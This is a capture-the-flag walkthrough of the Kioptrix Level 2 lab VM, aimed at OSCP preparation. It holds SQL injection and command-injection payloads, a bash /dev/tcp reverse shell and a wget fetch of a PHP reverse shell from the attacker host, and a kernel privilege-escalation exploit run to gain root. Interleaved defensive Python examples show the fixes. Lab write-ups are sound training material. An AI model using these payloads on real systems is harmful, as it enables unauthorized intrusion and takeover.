The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.

Welcome Back

It’s time for Level 2. These write-ups are for those who are preparing for the OSCP exam, and they help me improve my documentation skills along the way. Follow along.

Get the Machine's IP

Running netdiscover -r 192.168.100.0/24:

Currently scanning: 192.168.100.0/24   |   Screen View: Unique Hosts

 6 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 360
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.100.25  00:0c:29:99:7b:35      1      60  VMware, Inc.
 --snip--

Service Enumeration

Port and service enumeration with Nmap. According to the Kioptrix Level 2 description, the following vulnerabilities are expected:

  • OS Command Injection
  • Privilege Escalation
  • SQL Injection

I’ll use nmap -sV 192.168.100.25

Nmap options:

  • -sV: Probe open ports to determine service/version info
root@kali:~# nmap -sV 192.168.100.25
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-27 19:15 +04
Nmap scan report for 192.168.100.25
Host is up (0.0012s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:99:7B:35 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds

Web Server Enumeration

On port 80, a Remote System Administration Login page is being presented:

Remote System Administration Login
Username    ____________________
Password    ____________________
Login

(Output from Lynx, a text-based browser)

There’s no rabbit hole in the Kioptrix series so far, but I assume SQL injection will make an entry here. First, let’s run Nikto and Gobuster:

  • nikto:
root@kali:~/Kioptrix2# nikto -url http://192.168.100.25
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.100.25
+ Target Hostname:    192.168.100.25
+ Target Port:        80
+ Start Time:         2019-09-29 20:48:23 (GMT4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 22:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2019-09-29 21:10:20 (GMT4) (1317 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • gobuster:
root@kali:~/Kioptrix2# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.100.25
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.100.25
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/29 20:48:48 Starting gobuster
===============================================================
/usage (Status: 403)
===============================================================
2019/09/29 20:52:34 Finished
===============================================================

There’s nothing interesting. I tried some common credentials like admin/admin, admin/password, root/admin, and no errors popped up.

SQL Injection

Let’s try a classic SQLi from the OWASP Testing Guide:

  • username = 1' or '1' = '1
  • password = 1' or '1' = '1
Remote System Administration Login
Username    1' or '1' = '1
Password    **************
Login

It worked. I got access to a page where I can use the ping utility:
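To see why that payload bypasses the login, here is an added example (not the Kioptrix application's code, which the page never shows) that rebuilds the two ways a login query can be written, in Python against an in-memory SQLite table with a constructed user row. The concatenated version accepts the page's `1' or '1' = '1` payload; the parameterized version treats it as plain data. The table layout, the user row and the function names are my own assumptions.

```python
import sqlite3

# Constructed sample table: one user with a placeholder password. Not the
# Kioptrix database; the real app's schema was not shown on the page.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "placeholder-secret"))
    conn.commit()
    return conn

# The payload used against the login form in the write-up.
SQLI_PAYLOAD = "1' or '1' = '1"

def build_concatenated_query(username: str, password: str) -> str:
    # The weak pattern: form values pasted straight into the SQL text.
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # With the payload the WHERE clause becomes
    #   username='1' or '1' = '1' AND password='1' or '1' = '1'
    # AND binds tighter than OR, so the trailing OR '1' = '1' is true for every row.
    row = conn.execute(build_concatenated_query(username, password)).fetchone()
    return row is not None

def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterized query: the driver binds the values, so the quotes inside the
    # payload never become SQL syntax. (A real app would also compare a password
    # hash instead of storing plaintext; omitted to keep the contrast visible.)
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    print(build_concatenated_query(SQLI_PAYLOAD, SQLI_PAYLOAD))
    print("concatenated login accepts payload:", login_vulnerable(db, SQLI_PAYLOAD, SQLI_PAYLOAD))
    print("parameterized login accepts payload:", login_safe(db, SQLI_PAYLOAD, SQLI_PAYLOAD))
    print("parameterized login with real creds:", login_safe(db, "admin", "placeholder-secret"))
```

The printed query makes the precedence problem visible: the injected `or '1' = '1'` is evaluated outside the `AND`, so the row match no longer depends on the password at all.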

Welcome to the Basic Administrative Web Console
Ping a Machine on the Network: ______________________________ submit

Access to System Commands

Let’s redirect the output to /dev/null and execute whoami:

localhost > /dev/null ; whoami
apache
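Why the ping form can be driven this way, and what a fixed version looks like, as an added example that is not the Kioptrix application's code (the page does not show it): a `ping` wrapper that splices the form value into a shell string, beside one that only accepts an IP address or hostname and hands it to `ping` as a single argv element, so no shell ever parses it. The function names, the hostname pattern and the metacharacter list are my own choices; the hardened function builds the argv list but does not run ping.

```python
import ipaddress
import re
from typing import List

# Constructed inputs: a legitimate target and the injected string from the write-up.
LEGIT_TARGET = "192.168.100.25"
INJECTED_TARGET = "localhost > /dev/null ; whoami"

# Hostname labels: letters, digits and hyphens, dot-separated (strictness chosen for this demo).
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?"
    r"(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$"
)

def vulnerable_command(target: str) -> str:
    # The weak pattern behind the console: the form value is spliced into a shell
    # command line, so ';' ends ping and starts whatever follows it.
    return "ping -c 3 " + target

def is_valid_target(target: str) -> bool:
    # Accept exactly one IP address or one hostname; anything else is rejected.
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return _HOSTNAME_RE.match(target) is not None

def safe_ping_argv(target: str) -> List[str]:
    # Hardened form: validate first, then return an argv list meant for
    # subprocess.run(argv) without shell=True. The target is one argument,
    # so shell metacharacters are never interpreted.
    if not is_valid_target(target):
        raise ValueError("target is not an IP address or hostname")
    return ["ping", "-c", "3", target]

def injection_indicators(target: str) -> List[str]:
    # Log-review helper: which shell metacharacters appeared in a submitted value.
    return [ch for ch in (";", "|", "&", "`", "$", ">", "<", "\n") if ch in target]

if __name__ == "__main__":
    print("shell string the weak form would run:", vulnerable_command(INJECTED_TARGET))
    print("indicators:", injection_indicators(INJECTED_TARGET))
    print("accepted:", is_valid_target(LEGIT_TARGET), "rejected:", not is_valid_target(INJECTED_TARGET))
    print("argv:", safe_ping_argv(LEGIT_TARGET))
```

The allow-list check matters more than escaping: even with `shell=False`, a value such as `-f` would reach `ping` as an option, which is why the validator only passes through things that look like an address or a name.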

Great. PHP is executing system commands. Let’s see what SUID executables are on the system:

localhost > /dev/null ; find / -perm -u=s -type f 2>/dev/null
/sbin/unix_chkpwd
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/suexec
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth
/usr/lib/squid/ncsa_auth
/usr/bin/chsh
/usr/bin/rcp
/usr/bin/sudo
/usr/bin/chage
/usr/bin/crontab
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/lppasswd
/usr/bin/sg
/usr/bin/passwd
/bin/mount
/bin/traceroute6
/bin/traceroute
/bin/umount
/bin/ping6
/bin/ping
/bin/su
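A defender's counterpart to this enumeration, added here as an example and not part of the write-up: the listing above is treated as a known-good baseline, a later listing is compared against it, and any SUID file sitting in a user-writable directory is flagged. The later listing (one binary gone, one file added under /var/tmp) and the prefix list are constructed for the demo; only the baseline comes from the page.

```python
from typing import Dict, List, Set

# Baseline: the SUID listing from the write-up's find command on Kioptrix Level 2.
BASELINE_LISTING = """\
/sbin/unix_chkpwd
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/suexec
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth
/usr/lib/squid/ncsa_auth
/usr/bin/chsh
/usr/bin/rcp
/usr/bin/sudo
/usr/bin/chage
/usr/bin/crontab
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/lppasswd
/usr/bin/sg
/usr/bin/passwd
/bin/mount
/bin/traceroute6
/bin/traceroute
/bin/umount
/bin/ping6
/bin/ping
/bin/su
"""

# Constructed later listing for the demo: the baseline minus rsh, plus one SUID
# file in a world-writable directory. Neither change comes from the page.
LATER_LISTING = BASELINE_LISTING.replace("/usr/bin/rsh\n", "") + "/var/tmp/example-suid\n"

# Directories where a SUID file is unexpected (heuristic chosen for this demo).
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

def parse_suid_listing(text: str) -> Set[str]:
    # One absolute path per line; blank lines and stray prompt text are ignored.
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}

def diff_suid(baseline: str, current: str) -> Dict[str, List[str]]:
    # Set difference in both directions: new SUID files and ones that vanished.
    before, after = parse_suid_listing(baseline), parse_suid_listing(current)
    return {"added": sorted(after - before), "removed": sorted(before - after)}

def suspicious_locations(listing: str) -> List[str]:
    # SUID bits in user-writable trees deserve a look regardless of the diff.
    return sorted(p for p in parse_suid_listing(listing) if p.startswith(WRITABLE_PREFIXES))

def audit(baseline: str, current: str) -> Dict[str, List[str]]:
    report = diff_suid(baseline, current)
    report["suspicious"] = suspicious_locations(current)
    return report

if __name__ == "__main__":
    for key, paths in audit(BASELINE_LISTING, LATER_LISTING).items():
        print(key + ":", paths or "-")
```

Run the same `find` on a freshly built host to capture the baseline, and re-run it on a schedule; the interesting output is the diff, not the 34-line list itself.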

Interesting! GTFOBins maintains a list of Unix binaries that an attacker can abuse to bypass local security restrictions. If one of these SUID binaries is on that list, a kernel exploit won’t be necessary. Let’s deploy a reverse shell (I found two ways to do this):

Reverse Shells

  • 1: localhost > /dev/null ; bash -i >& /dev/tcp/192.168.100.30/1234 0>&1
root@kali:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.25] 32769
bash: no job control in this shell
bash-3.00$ whoami ; id
apache
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ 
  • 2: Use the php-reverse-shell.php that is shipped with Kali:
root@kali:/usr/share/webshells/php# pwd
/usr/share/webshells/php
root@kali:/usr/share/webshells/php# ls | grep php
php-backdoor.php
php-reverse-shell.php
qsd-php-backdoor.php
simple-backdoor.php
root@kali:/usr/share/webshells/php# 

Let’s see what directories are owned by apache:

localhost > /dev/null ; find / -user apache | grep -v proc
/var/cache/mod_proxy
/var/cache/mod_ssl
/var/lib/dav

Nice. /var/lib/dav is a great location to upload the php-reverse-shell to. Make a copy of the PHP shell in /tmp and edit the file to enter your machine’s IP and port.

Yeah, I know the first bash reverse shell was a lot easier, but as a pentester, if there are 10 ways to do something, DO IT. Read every write-up submitted on VulnHub, etc., and try to reproduce it.

OK. Let’s deploy a web server on top of /tmp/ by running:
python3 -m http.server --bind 192.168.100.30 9191

root@kali:/tmp# python3 -m http.server --bind 192.168.100.30 9191
Serving HTTP on 192.168.100.30 port 9191 (http://192.168.100.30:9191/) ...

Let’s jump back to the ping utility and download it into /var/lib/dav:

localhost > /dev/null ; cd /var/lib/dav ; wget http://192.168.100.30:9191/php-reverse-shell.php

Let’s verify it:

localhost > /dev/null ; ls /var/lib/dav/
php-reverse-shell.php

Make sure your machine is listening on the port you entered earlier. Enable the execute permission on php-reverse-shell.php and run it:

root@kali:/tmp# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.25] 32771
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 23:33:58 up  1:09,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$ 

Awesome :D

IppSec’s technique to obtain an interactive shell

Execute: python -c 'import pty;pty.spawn("/bin/bash");'

sh-3.00$ python -c 'import pty;pty.spawn("/bin/bash");'        
bash-3.00$

Press CTRL+Z to background netcat/nc. Enter stty raw -echo. Then run fg to bring the shell back.

Now you can press CTRL+L to clear the screen, use tab completion, and so on.

Privilege Escalation

GTFOBins has nothing useful for these binaries. Let’s see what kernel/OS version is running:

bash-3.00$ cat /proc/version 
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8))#1 Wed May 2 13:52:16 EDT 2007
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
bash-3.00$ 

Exploit-db:

root@kali:/tmp# searchsploit centos 4.5
------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                            |  Path
                                                                                          | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_ap | exploits/linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation             | exploits/linux/local/35370.c
------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

That’s the first one. Switch to the reverse shell, download it into /tmp (anyone can write in /tmp), compile it and execute:

bash-3.00$ gcc 9542.c -o shell
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ./shell 
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# 

You’re root.

Try different ways to do this. For example, if wget were not available, you’d have to deploy your own web server like I did above, and then use curl to download the file.

The exploit will only compile and run on 32-bit machines. To compile it on a 64-bit machine, install the following:

apt-get install gcc-multilib -y ; apt-get upgrade clang -y

Then:

gcc -m32 -o exploit 9542.c

Thank you for reading. Stay tuned for Level 3.


"The name of the Lord is a strong tower;the righteous run into it and are safe." Proverbs 18:10